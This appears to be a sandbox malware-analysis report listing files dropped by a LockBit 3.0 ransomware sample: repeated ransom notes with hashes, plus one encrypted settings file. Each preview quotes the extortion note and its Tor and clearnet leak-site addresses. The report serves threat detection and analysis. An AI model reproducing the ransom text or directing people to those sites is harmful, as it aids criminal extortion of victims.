                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.CredDialogHost_cw5n1h2txyewy\TempState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.CredDialogHost_cw5n1h2txyewy\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\AC\Temp\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\AC\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\AppData\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\LocalCache\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\LocalState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\RoamingState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\Settings\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\Settings\settings.dat.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):8431
                Entropy (8bit):7.981118633318663
                Encrypted:false
                SSDEEP:192:D67BlYeTTvvNd1CrYl0B3CnuB2xw6nzdy211gSMHkn4UNE7+To:mNlvvNd4YiydZp1ySME4UaKU
                MD5:8B1872E305013384F69E14C598D69366
                SHA1:D6EA3616F256EE653F486E8D5346C5783BC70D8D
                SHA-256:083E44F955868C178A034465D3EF3889BC0B51273992265EDF2DE00D64F9E207
                SHA-512:D942AEC7EA90E44266992C8A81CE617694EDF17585F6FC801F1E19C20EC41EFD0D569A8DBCCCFCB1526521BDA66ABC3795403F04FF2E02BD8E1BB9D571221352
                Malicious:false
                Preview:x/...".6.Jp3@0r...`..._....h..KZ..X..L_..s.~...2..B......fynzJ.ey..Z{mN......\.r.a%....."..8M].j%x.Q.C.....B2..4...C.W..a.Fo}.kO......;.7...o..........P...ks.:e..(B.xT8.XV...Y...D.s....N.0..}..Y...A.+...q?./k..+.P...!j..=...$...F.q............+\.'.<"`..n.<..hLyu{...B..P.x....|Z>.q.8.`...[.7S....R.X..../.....e.ms.,w....#.....hd...(..;h.s.8......0)....%..J.I-.S..W/.. .@Fb..G.L.......reJ.....M.Q.H.....V.X..?/_.O7f....cd.......2.z....|......1T..@Y..H..o.n.5...\...L:y..|v].A.sp..a\.U.P.....#...)...&.Y.ub..dO6..:AwX.eR.W6...9.G.if.m...2.z....L<...{Z..A#....pt.>`.>...N....x@....3..q(.3..1.NR......b3.........c....e.E[.......R.IS!...@6..Ef..O..b..R7..^]..8...%.."./.7..l3.)e....~6..{.R.......K..Y..*.....<..Hz...z..)...F....L:.&".2........e....)FN.2Q...`j...}.....G.Xu.)...2.y.Y2...>[<_.p......P-a...........O.U.&...B..hj...._z.V6.....{q.~.S...}..Pl..6.D<.b....L.-G....i.]0....Fp. ..1.j...ov.UG.R....F.):.$Eh.<0v.z...[B......&./................!..&...

                C:\Users\user\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\SystemAppData\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\TempState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.ECApp_8wekyb3d8bbwe\AC\Temp\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
